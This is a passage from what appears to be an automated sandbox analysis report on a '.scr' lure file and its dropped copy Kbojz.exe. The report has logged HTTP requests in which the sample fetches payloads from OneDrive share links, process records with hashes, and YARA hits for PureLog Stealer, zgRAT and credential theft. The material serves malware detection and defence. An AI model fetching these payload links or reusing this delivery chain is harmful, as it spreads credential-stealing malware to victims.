5fd6fc6db4-6dwr7 X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 1D96AA48284B4A9D9C765BA0DC3A3F4F Ref B: BN3EDGE0822 Ref C: 2024-04-19T14:16:44Z Date: Fri, 19 Apr 2024 14:16:44 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49172	13.107.137.11	443	3224	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Timestamp	Bytes transferred	Direction	Data
2024-04-19 14:16:47 UTC	129	OUT	GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
2024-04-19 14:16:47 UTC	1171	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://public.am.files.1drv.com/y4mwFu8VbGByM_Q7z-aa3kXSHpyVeSwXW2bYOApH-e631-D-8uUIicootAywp08FoH81YRjxNfV8hCP3xSVy9f23NbiY09zB0_yJ37bQUuIDpC-06Ih9Qe7jL-MoeIUgOzmKakMY3-WhCRl0Y2P1pgrzHwu-MFKAiw9TE3wJ4ZbnEB74kLbrehBDQarp5Gp6tYKkmH2Acue7mieN_bJ8MSlzA/Vhggo.mp4?download&psid=1 Set-Cookie: E=P:BdgXWXtg3Ig=:DIto+ZxSGkLTOocpE0k1vAoj7/eNN6VU9NoKz5RTgyA=:F; domain=.live.com; path=/ Set-Cookie: xid=b39f5967-1a88-4529-98aa-595f59c4550f&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:36:47 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:16:47 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 5fd6fc6db4-c6vb8 X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: BE24B4FC6E1D429AB1E48F750FA0B4BA Ref B: BN3EDGE0511 Ref C: 2024-04-19T14:16:47Z Date: Fri, 19 Apr 2024 14:16:47 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49175	13.107.137.11	443	3552	C:\Users\user\AppData\Roaming\Kbojz.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-19 14:17:07 UTC	129	OUT	GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
2024-04-19 14:17:08 UTC	1171	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://public.am.files.1drv.com/y4mQE8Cn-ey22tLqFzNP6Bvc0YOHW16UYVvHKAtb_HbiHHBX320gCSUBo3NE91NAaiUAQmg8Nbiivg1yPXAGH6v27TTmlKBVv-073G6ZiVXzDsuOkdNuJdxsUblirTwudCsrvXLiIxW8pukSbQDJBU0G0VTQgIrwwJLLC9iaBHsovUud7otogTkUv_eJuu9AUZGkxSelbm1lRHM-KTz3-v-4g/Vhggo.mp4?download&psid=1 Set-Cookie: E=P:fuVTZXtg3Ig=:d+NPprUU5s6Trbg4OC6yufJZyrUUNiFVjp/2eTVO5vY=:F; domain=.live.com; path=/ Set-Cookie: xid=061dfda0-862e-4227-bf01-f86f7242e6f6&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:07 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:08 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 676c7b6ddb-m4n68 X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: A4C9EF305CEC4222A34A65790C8B8A2C Ref B: BN3EDGE0312 Ref C: 2024-04-19T14:17:07Z Date: Fri, 19 Apr 2024 14:17:08 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49178	13.107.137.11	443	3652	C:\Users\user\AppData\Roaming\Kbojz.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-19 14:17:16 UTC	129	OUT	GET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
2024-04-19 14:17:16 UTC	1171	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://public.am.files.1drv.com/y4msme9eT8kXrOR-7wV9kiBohdMur1Lbs151ysdQuqKOSsl3mAiWGdSV3LP6WqYY9vaEmOeEaKNNaWVRUIPhB_Blfj8yVRyJ6BjzR4sn5wge-umfDwOTsFL9AbGqDVT1jVd0rM5IYv-t4mgApw-LuJkybdtukHbPFOWObLH67dfDOLOd_xpdmsCj1hSlEq0DUB90gKTha2G-cWPlkEsTZ0dww/Vhggo.mp4?download&psid=1 Set-Cookie: E=P:aAVvantg3Ig=:KdQd9YRzT74bjky3qew+rBL8ZQP1ibwWK5/kEfZ6R8M=:F; domain=.live.com; path=/ Set-Cookie: xid=991bff75-a086-4591-86e1-578eb56155cd&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:16 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:16 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 5fd6fc6db4-6dwr7 X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 3F564190A34F4BA8B6C5589CD8AC88E0 Ref B: BN3EDGE0918 Ref C: 2024-04-19T14:17:16Z Date: Fri, 19 Apr 2024 14:17:16 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49179	13.107.137.11	443	3372	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Timestamp	Bytes transferred	Direction	Data
2024-04-19 14:17:17 UTC	129	OUT	GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
2024-04-19 14:17:18 UTC	1172	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://utqurw.am.files.1drv.com/y4mFbMW97TPAIW_iquyB-Ao69Foeiu4Lp0Em3x5_9O_Ik0LysS9rZcK8ox-X1EantadX6zPJmPeLGvn8sMZEkdzWf316jERXkan1Q16OefutHcuGhocvuHjn3H8p_Izp5tXJT2YIxFPkMbQhZkbUj3qPOR-CDNi7iP1MwDiO8cqS4T6od19eItzzwNuM6Cd9QwEzNYR-jshSSJr9NHbP-uKTA/origin.scr?download&psid=1 Set-Cookie: E=P:Xw9Aa3tg3Ig=:JT+LJxbD/EnasXmJh/npw18spUw9uUbhb4HTpOU5wSU=:F; domain=.live.com; path=/ Set-Cookie: xid=2f75faa7-51f6-49b1-905b-e93f032eb20e&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:17 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:18 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 5fd6fc6db4-4qw5w X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: D2512EE78FED43E19990237B3ECB9651 Ref B: BN3EDGE0217 Ref C: 2024-04-19T14:17:17Z Date: Fri, 19 Apr 2024 14:17:17 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49184	150.171.41.11	443	3840	C:\Users\user\AppData\Roaming\Kbojz.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-19 14:17:47 UTC	129	OUT	GET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1 Host: onedrive.live.com Connection: Keep-Alive
2024-04-19 14:17:48 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://utqurw.am.files.1drv.com/y4ms_vWzniFUJaBcF0Y1jNwvuu_3iedMM7s1JmtuLb_AtOzVrcYjTWzJYemZ-gol7I6RGKjZschyrQhjAKimK1xLdYcfyjUcdIjmXB9U6RVFKMtOfxS_yxsIqr4_2Dn5pWe6FB3nf-ZRd-Vdfk7Zek0qdCjtBktsgzZiQiRZWqkaV0wp2YAK5pRG8MfMkzHNgxFdKkf-gd0Cr4XSlkfbrmcQA/origin.scr?download&psid=1 Set-Cookie: E=P:MrX8fHtg3Ig=:Vk/OiM5weglIgwYxtwolURFdXSi85Hnqyu9ijMVGAa4=:F; domain=.live.com; path=/ Set-Cookie: xid=b749387f-6e04-4b27-8eaf-5723695edfd6&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:47 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:48 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 59d5745476-pgbg9 X-ODWebServer: nameastus2300077-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: E780DEC70D74464EA96781016A9834A3 Ref B: BL2AA2010202021 Ref C: 2024-04-19T14:17:47Z Date: Fri, 19 Apr 2024 14:17:47 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	16:16:40
Start date:	19/04/2024
Path:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr" /S
Imagebase:	0x80000
File size:	37'688 bytes
MD5 hash:	F99DC4D2E045AE0BBC169FFF12A5C6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.359357988.0000000006010000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:16:50
Start date:	19/04/2024
Path:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"
Imagebase:	0x80000
File size:	37'688 bytes
MD5 hash:	F99DC4D2E045AE0BBC169FFF12A5C6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.419873303.0000000000640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.424766179.0000000003EDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.424766179.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.431703132.00000000046B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.432614615.0000000004CF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:17:01
Start date:	19/04/2024
Path:	C:\Users\user\AppData\Roaming\Kbojz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Kbojz.exe"
Imagebase:	0x800000
File size:	37'688 bytes
MD5 hash:	F99DC4D2E045AE0BBC169FFF12A5C6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.407176401.0000000002384000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.410066207.000000000392F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.410066207.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 64%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:17:11
Start date:	19/04/2024
Path:	C:\Users\user\AppData\Roaming\Kbojz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Kbojz.exe"
Imagebase:	0x800000
File size:	37'688 bytes
MD5 hash:	F99DC4D2E045AE0BBC169FFF12A5C6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.420766544.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.423329091.0000000003990000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:17:14
Start date:	19/04/2024
Path:	C:\Users\user\AppData\Roaming\Kbojz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Kbojz.exe"
Imagebase:	0x800000
File size:	37'688 bytes
MD5 hash:	F99DC4D2E045AE0BBC169FFF12A5C6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.472630617.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:17:18
Start date:	19/04/2024
Path:	C:\Users\user\AppData\Roaming\Kbojz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Kbojz.exe"
Imagebase:	0x800000
File size:	37'688 bytes
MD5 hash:	F99DC4D2E045AE0BBC169FFF12A5C6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	135
Total number of Limit Nodes:	6

Executed Functions

Function 046AB4B0 Relevance: 16.1, Strings: 12, Instructions: 1099COMMON

Download Yara Rule

Strings

$p, xrefs: 046AB9A7
$p, xrefs: 046AB733
$p, xrefs: 046AB907
$p, xrefs: 046ABD91
$p, xrefs: 046AB743
,p, xrefs: 046ABF6A
$p, xrefs: 046ABD81
$p, xrefs: 046ABDDA
4, xrefs: 046ABE85
$p, xrefs: 046AB9B7
$p, xrefs: 046ABDEA
$p, xrefs: 046AB8F7

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,p$4$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-142193208
Opcode ID: 7fe4ee81bf2805dc332a61b94445b54b16ae5605a924f3825c27588c6daf29fb
Instruction ID: 6464de84b47233b9474314a12ac1c2d7a2e825ee2665750a7902a151e3b3070d
Opcode Fuzzy Hash: 7fe4ee81bf2805dc332a61b94445b54b16ae5605a924f3825c27588c6daf29fb
Instruction Fuzzy Hash: D1B20774A00618CFDB14DFA9C894BADB7B6BF88700F158199E605AB3A5DB70ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046AB7D7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$p, xrefs: 046AB9A7
,p, xrefs: 046ABF6A
$p, xrefs: 046ABD81
$p, xrefs: 046ABDDA
4, xrefs: 046ABE85
$p, xrefs: 046AB8F7

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,p$4$$p$$p$$p$$p
API String ID: 0-3956653638
Opcode ID: f25fafd9756fb51138fe19e2cb10ba81e53b870ba533c42d9af97869fc913b78
Instruction ID: 8b96882760784021b4f3c3597b5cc25252b019075c1b111a59a996c2bc540e65
Opcode Fuzzy Hash: f25fafd9756fb51138fe19e2cb10ba81e53b870ba533c42d9af97869fc913b78
Instruction Fuzzy Hash: 4C221A34A00614CFDB24DFA5C894BADB7B6FF88704F148199D609AB3A5EB70AD91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004CE8E0 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pp, xrefs: 004CF49A
xbp, xrefs: 004CEA0D
TJp, xrefs: 004CEA82
4'p, xrefs: 004CF3B3
Tep, xrefs: 004CF003

Memory Dump Source

Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p$TJp$Tep$pp$xbp
API String ID: 0-1160029363
Opcode ID: 415e4d72f62fdd980415dfe7e51fa1437d79bdf78e9d8438aa1b4a0ae672da0c
Instruction ID: b6829e5a9558b8c7ce078493efe9bb24e31cef5e998f927d7e53ef32dcc392eb
Opcode Fuzzy Hash: 415e4d72f62fdd980415dfe7e51fa1437d79bdf78e9d8438aa1b4a0ae672da0c
Instruction Fuzzy Hash: B2A2B575A00228CFDB64CF69C984B99BBB2FF89304F1581E9D509AB325DB359E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01F10040 Relevance: 3.6, Strings: 2, Instructions: 1081
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 01F10B80
$p, xrefs: 01F10540

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 2$$p
API String ID: 0-255402429
Opcode ID: 9812dda23362cd56f92aa3561064fa6d38fb0ef2ac58efba1cf01e769d8f9577
Instruction ID: a0cf23853d75e36bc0f54ac542f97f13f99a39d6b5c53253f14b53be0232dcb8
Opcode Fuzzy Hash: 9812dda23362cd56f92aa3561064fa6d38fb0ef2ac58efba1cf01e769d8f9577
Instruction Fuzzy Hash: 24C292B4E01228CFDB65DF69C994B9DBBB5BB88300F1081E9D509AB359DB319E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 058CD650 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Dp, xrefs: 058CD755

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Dp
API String ID: 0-2141643023
Opcode ID: d05c75df160265b353d7403b7710695d5eb5600ae4f42be43dd4ca5425b72d03
Instruction ID: cc57f774265c33b3d1444e4eeed93828b487d90afdc3e9c145f58c32ebddde32
Opcode Fuzzy Hash: d05c75df160265b353d7403b7710695d5eb5600ae4f42be43dd4ca5425b72d03
Instruction Fuzzy Hash: CDD1BF74A01258CFDB54DFA9D994BADBBB2FF88300F1081A9D409AB365DB35AD81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046A8178 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

Tep, xrefs: 046A84D9

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Tep
API String ID: 0-914316021
Opcode ID: 49292f6c21162b1dadf287f6cea79c0d03d8ea7116e70e317b4187e5f6676f7d
Instruction ID: 031d144615c71f8501753e1b3a71a0dcc1d52b7649d74f4baf1cecbcc121014f
Opcode Fuzzy Hash: 49292f6c21162b1dadf287f6cea79c0d03d8ea7116e70e317b4187e5f6676f7d
Instruction Fuzzy Hash: 70B1E670E04A18CFDB14EFA9D944BADBBF2FB89300F1491A9D409AB255E7746D96CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01F1B040 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

Tep, xrefs: 01F1B1CF

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Tep
API String ID: 0-914316021
Opcode ID: 7e272509f5a97b870926c1f20705fa5080de19f8043f858f2fd11833348d744e
Instruction ID: 849e571a4f08576b5204a7951859dd138bb1a3da9b42c9550bdd5a1e30449967
Opcode Fuzzy Hash: 7e272509f5a97b870926c1f20705fa5080de19f8043f858f2fd11833348d744e
Instruction Fuzzy Hash: C6A1E270E05218CFDB24CFA9D984BEDBBF2BF89300F249169D419AB259DB765985CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01F1142C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee6a0a2a08cda26d88c38b4e5ec5ade2ea9595ca84394c26b102f2816d41aa8
Instruction ID: 945610f41e63f42211a84990795f370b952817ab6e5cf8b583e85e45dd02018d
Opcode Fuzzy Hash: 4ee6a0a2a08cda26d88c38b4e5ec5ade2ea9595ca84394c26b102f2816d41aa8
Instruction Fuzzy Hash: 1D32C374A042298FCB65DF28C884BA9B7B6FF48300F5585E9E90DA7355DB31AE81CF44

Uniqueness

Uniqueness Score: -1.00%

Function 01F00FA8 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025595225401ac0b12a935dbacc09dc1dcd913bf4cee6bf51a4da24fd6fb9174
Instruction ID: ba36a04d031adcba4f10d7597caad34c9d9a5418be45335f782f5e64a0545f6b
Opcode Fuzzy Hash: 025595225401ac0b12a935dbacc09dc1dcd913bf4cee6bf51a4da24fd6fb9174
Instruction Fuzzy Hash: 00B10570E06218CFDB55DFA9D984BADBBF2FB49300F1091AAD409A7295DB359E81DF00

Uniqueness

Uniqueness Score: -1.00%

Function 01EFF6B8 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911fc154aa779883734d1b48a2e6ea6613fa265b0148c6be97c0cb3e9709854b
Instruction ID: caa398cad74f7497655f192fc6c9cc5c53429b3e370171d53a939ebfbc89da83
Opcode Fuzzy Hash: 911fc154aa779883734d1b48a2e6ea6613fa265b0148c6be97c0cb3e9709854b
Instruction Fuzzy Hash: 33A1D175E01218CFDB14CFA9D984BDDBBF2BF89304F14A16AD909AB255DB349985CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01F10006 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5815eafe40832eed0bf592e6643a12a16e5327f84f82031f8f9ee6f18bf7947
Instruction ID: 069b2b62e67ed1bf3bd39d200554fa7a20a8e8f693e388b5baced8b8e76ec0fb
Opcode Fuzzy Hash: a5815eafe40832eed0bf592e6643a12a16e5327f84f82031f8f9ee6f18bf7947
Instruction Fuzzy Hash: 57510EB1E056588BEB19CF6BD84029ABBF3AFC9300F14C1BAD548AB259DB340985CF54

